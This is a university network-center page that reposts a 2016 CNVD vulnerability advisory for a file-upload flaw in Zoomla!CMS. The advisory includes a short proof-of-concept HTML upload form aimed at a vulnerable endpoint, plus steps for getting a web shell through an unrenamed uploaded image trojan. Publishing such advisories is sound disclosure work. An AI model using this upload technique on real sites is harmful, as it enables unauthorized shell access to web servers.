内部网  深大主页 

 
首 页 | 学生自助服务 | 下载专区 | 故障报修 | VPN | 教工区上网登录 | 校园卡 | 联系我们  (关注微信号)    
  用户指南
 · 上网:怎么开户资费带宽
 · 故障报修:学生区|教工区
 · 学生自助服务:开户/套餐/续费
 · 校外访问校内1:WebVPN
 · 校外访问校内2:零信任系统
 · 教师邮箱学生邮箱
 · 邮件客户端如何收发邮件?
 · 教师邮箱如何使用二次验证?
 · 电子哨兵会议签到指南
  网上服务
 · 统一身份认证(个人中心)
 · 正版软件
 · 网络带宽测试
 · 失物招领|寻物启事
  政策法规
 · 《学生区网络使用及收费说明》
 · 《学生区网络常见问题汇总》
 · 《教工区校园网收费管理规定》
 · 《校园网用户管理办法》
 · 《互联网安全保护管理办法》

校园网出口实时流量监控图
信息检索
 >>网络安全
Zoomla!CMS最新版文件上传漏洞

Zoomla!CMS最新版文件上传漏洞

CNVD-ID CNVD-2016-07338 录入时间 2016-09-08
危害级别 高危   评分:10 报送时间 2016-09-07
产生原因 设计错误 归档时间 2016-09-08
引发威胁 管理员访问权限获取 公开时间 2016-12-07
攻击位置 远程 发现时间 2016-09-07
影响对象类型 WEB应用漏洞 是否热点漏洞
涉及厂商 逐浪软件
影响产品 逐浪软件 Zoomla!CMS2 X3.5
漏洞描述 Zoomla!逐浪CMS是CMS网站内核与管理系统研发厂商,集成内容管理、商城、OA、SNS、项目管理、采集、邮件订阅百项功能,基于.net平台并支持跨平台与移动。 Zoomla!CMS最新版存在文件上传漏洞。通过本地制作一个html页面 <form action="http://192.168.2.85:8889/Plugins/Office/OfficeAction.ashx?Action=saveword" method="post" enctype="multipart/form-data" name="file"> <input name="files" type="file" /> <input name="11" type="submit" value="111" /> </form>选一个图片木马,直接上传返回为true,上传成功。默认情况下的程序会自动生成一个0目录存在上传的文件,具体路径是UploadFiles\OA\0,由于上传后未能对重命名操作,成功获得shell。
参考链接 http://loudong.360.cn/vul/info/id/175200 https://butian.360.cn/vul/info/qid/QTVA-2016-525605
解决方案 厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: https://www.z01.com/
厂商补丁 (暂无补丁信息)
验证信息 未验证

 
 学生区网络:26913311(中国电信)、18476328678(中国移动)
 教学办公区网络:26536188
您的IP:216.73.216.175 时间:2025/8/23 3:10:47 
版权所有©深圳大学信息中心